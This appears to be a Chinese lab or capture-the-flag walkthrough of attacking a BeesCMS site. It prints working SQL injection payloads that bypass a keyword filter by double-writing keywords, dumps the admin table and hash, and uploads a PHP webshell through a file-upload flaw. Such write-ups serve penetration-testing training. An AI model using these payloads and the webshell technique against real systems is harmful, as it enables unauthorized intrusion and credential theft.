尤里的复仇Ⅱ sql-注入绕过防护getshell

Tips:

这天，在朋友的介绍下，他受邀测试了某集团的网站，在签完授权合同后，他平复下激动的心情，找到漏洞所在点，祭出神器，结果……
他发现有拦截，于是开始放下工具，学习如何绕狗……
最终，他成功完成了这次任务

一个基础的绕过，感受下绕过的逻辑

信息搜集

访问网站，查询网站指纹beescms，网上搜漏洞，找到sql注入存在的后台

绕过防护报错注入

用户名等于1’，提示数据库报错，存在注入点。

祭出burpsuite进行报错注入

根据回显很清楚的判断出存在敏感信息过滤，双写入绕过

暴库

1' or updatexml(1,concat(0x7e,(sselectelect database()),0x7e),1)#

bees

暴表

这里把where给过滤了，绕过wh+where+ere

等于号用like代替

1' or updatexml(1,concat(0x7e,(sselectelect group_concat(table_name) fr+from+om information_schema.tables wh+where+ere table_schema like'bees'),0x7e),1)#

‘~bees_admin,bees_admin_group,bee’

暴字段

1' or updatexml(1,concat(0x7e,(sselectelect group_concat(column_name) fr+from+om information_schema.columns wh+where+ere table_name like'bees_admin'),0x7e),1)#

‘~id,admin_name,admin_password,ad’

暴数据

提示只能显示一行的数据，需要加上limit 1 做限制

1' or updatexml(1,concat(0x7e,(sselectelect admin_name fr+from+om bees_admin limit 1),0x7e),1)#

1' or updatexml(1,concat(0x7e,(sselectelect admin_password fr+from+om bees_admin limit 1),0x7e),1)#

账号：admin

密码：21232f297a57a5a743894a0e4a801fc

网上解码的密码为admin

登入后台getshell

发现有文件上传漏洞

上传图片马，修改后缀名为php绕过前端检验

点击上传了的图片解析一句话木马

用菜刀连接拿到shell，然后找到flag